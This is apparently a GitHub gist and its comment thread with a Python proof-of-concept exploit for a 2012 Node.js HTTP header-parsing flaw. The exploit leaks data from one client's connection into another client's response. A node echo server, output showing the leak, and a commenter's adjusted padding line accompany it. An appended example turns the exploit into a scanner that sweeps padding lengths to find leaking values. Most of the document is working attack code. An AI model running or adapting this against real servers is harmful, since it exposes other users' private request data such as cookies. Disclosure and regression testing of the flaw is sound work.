#!/usr/bin/env python
import socket
import sys
import time

def round_up(n, r):
    return (n + r - 1) // r * r

# Connection 1: a request whose last header ("X:") is left open with a folded
# continuation line, so the parser is stopped mid-header when we pause.
s = socket.socket()
s.connect(("localhost", 8080))
buf = b"GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\nX:\r\n "
s.sendall(buf)
time.sleep(0.1)

# Connection 2: unrelated data that must never be visible to connection 1.
s2 = socket.socket()
s2.connect(("localhost", 8080))
buf2 = b"This is private data, perhaps an HTTP request with a Cookie in it."
s2.sendall(buf2)
time.sleep(0.1)

# Finish the folded header on connection 1 with padding sized to realign the
# parser's buffer, then print the response: a vulnerable server echoes buf2.
s.sendall(b"A" * (3 + round_up(len(buf), 16) - len(buf) + round_up(len(buf2), 16)) + b"\r\n\r\n")
while True:
    b = s.recv(1024)
    if not b:
        break
    sys.stdout.write(b.decode("latin-1"))

#!/usr/bin/env node
// stringptr-update-poc-server.js: echoes the request's "X" header back to the
// client (node lowercases header names, hence req.headers['x']).
var http = require('http');
http.createServer(function (req, res) {
  res.writeHead(200, {'Content-Type': 'text/plain'});
  res.end('X header: ' + req.headers['x']);
}).listen(8080);

isaacs commented May 7, 2012

$ ./node ~/stringptr-update-poc-server.js &
[1] 11801
$ ~/
HTTP/1.1 200 OK
Content-Type: text/plain
Date: Wed, 18 Apr 2012 00:05:11 GMT
Connection: close
Transfer-Encoding: chunked

X header:
 This is private data, perhaps an HTTP request with a Cookie in it.

paradela commented Nov 30, 2014

Hey, I was trying to reproduce the vulnerability, and I can't get the "private" data...

I tried a lot of the versions that were marked as vulnerable, and I couldn't get the data as you did. Is there anything else that I need to know?

Ty in advance ;)

EDIT: I finally got it to work, but in line 24 of I needed to change it to:
s.sendall("A" * (3 + len(buf2)) + "\r\n\r\n")

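An added example, not part of the gist or of either comment: a reusable checker that replays the exchange above with several candidate padding lengths, namely the 16-byte alignment formula from the script, the plain 3 + len(buf2) value from the comment thread, and a small sweep around each, and reports which lengths cause bytes from the second connection to surface in the first connection's response. The sleeps, the marker substring, the sweep width and the mock server are all constructed for this example; the mock uses Python's own HTTP parser, so it is not expected to leak and only lets the harness run offline. Point scan() at the node build under test instead.

```python
import socket
import threading
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Connection 1 request: header "X:" left open with a folded continuation line.
HEAD = b"GET / HTTP/1.1\r\nHost: localhost\r\nConnection: close\r\nX:\r\n "
# Connection 2 payload (same text as the gist); constructed canary.
PRIVATE = b"This is private data, perhaps an HTTP request with a Cookie in it."
MARKER = b"private data"  # substring we look for in connection 1's response


def round_up(n, r):
    return (n + r - 1) // r * r


def padding_lengths(head=HEAD, private=PRIVATE, sweep=8):
    """Candidate padding sizes, most promising first: the gist's alignment
    formula, the 3 + len(buf2) value from the comments, then +/- sweep
    around each (the sweep is an addition of this example)."""
    formula = 3 + round_up(len(head), 16) - len(head) + round_up(len(private), 16)
    plain = 3 + len(private)
    cands = [formula, plain]
    for base in (formula, plain):
        for delta in range(-sweep, sweep + 1):
            n = base + delta
            if n > 0 and n not in cands:
                cands.append(n)
    return cands


def probe(host, port, pad, timeout=2.0):
    """Replay the gist's exchange with one padding length. Returns True if
    data sent on connection 2 appears in connection 1's response."""
    s = socket.create_connection((host, port), timeout=timeout)
    s2 = None
    resp = b""
    try:
        s.sendall(HEAD)
        time.sleep(0.05)  # assumed enough for the server to parse the partial header
        s2 = socket.create_connection((host, port), timeout=timeout)
        s2.sendall(PRIVATE)
        time.sleep(0.05)
        s.sendall(b"A" * pad + b"\r\n\r\n")  # complete the folded header
        while True:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                break
            if not chunk:
                break
            resp += chunk
    finally:
        s.close()
        if s2 is not None:
            s2.close()
    return MARKER in resp


def scan(host, port, pads):
    """Return the padding lengths for which probe() saw the canary."""
    return [pad for pad in pads if probe(host, port, pad)]


class _EchoX(BaseHTTPRequestHandler):
    """Constructed stand-in for the gist's node server: echoes header X.
    It is Python's stdlib parser, so no leak is expected from it."""

    def do_GET(self):
        body = ("X header: " + str(self.headers.get("x", ""))).encode("latin-1")
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Connection", "close")
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass


def start_mock_server():
    """Start the mock on an ephemeral port; returns (server, port)."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), _EchoX)
    srv.daemon_threads = True
    # connection 2 never sends a valid request line; keep its error quiet
    srv.handle_error = lambda request, client_address: None
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


if __name__ == "__main__":
    # Run against the gist's server (node on localhost:8080).
    leaked = scan("localhost", 8080, padding_lengths())
    print("leaking padding lengths:", leaked or "none")
```

The sweep matters because, as the comment thread shows, the padding that lines up the leak differs between builds; rather than guess one formula, the checker tries both reported ones and their neighbours and reports every length that reproduces the leak, which is also the value a fix should be regression-tested against.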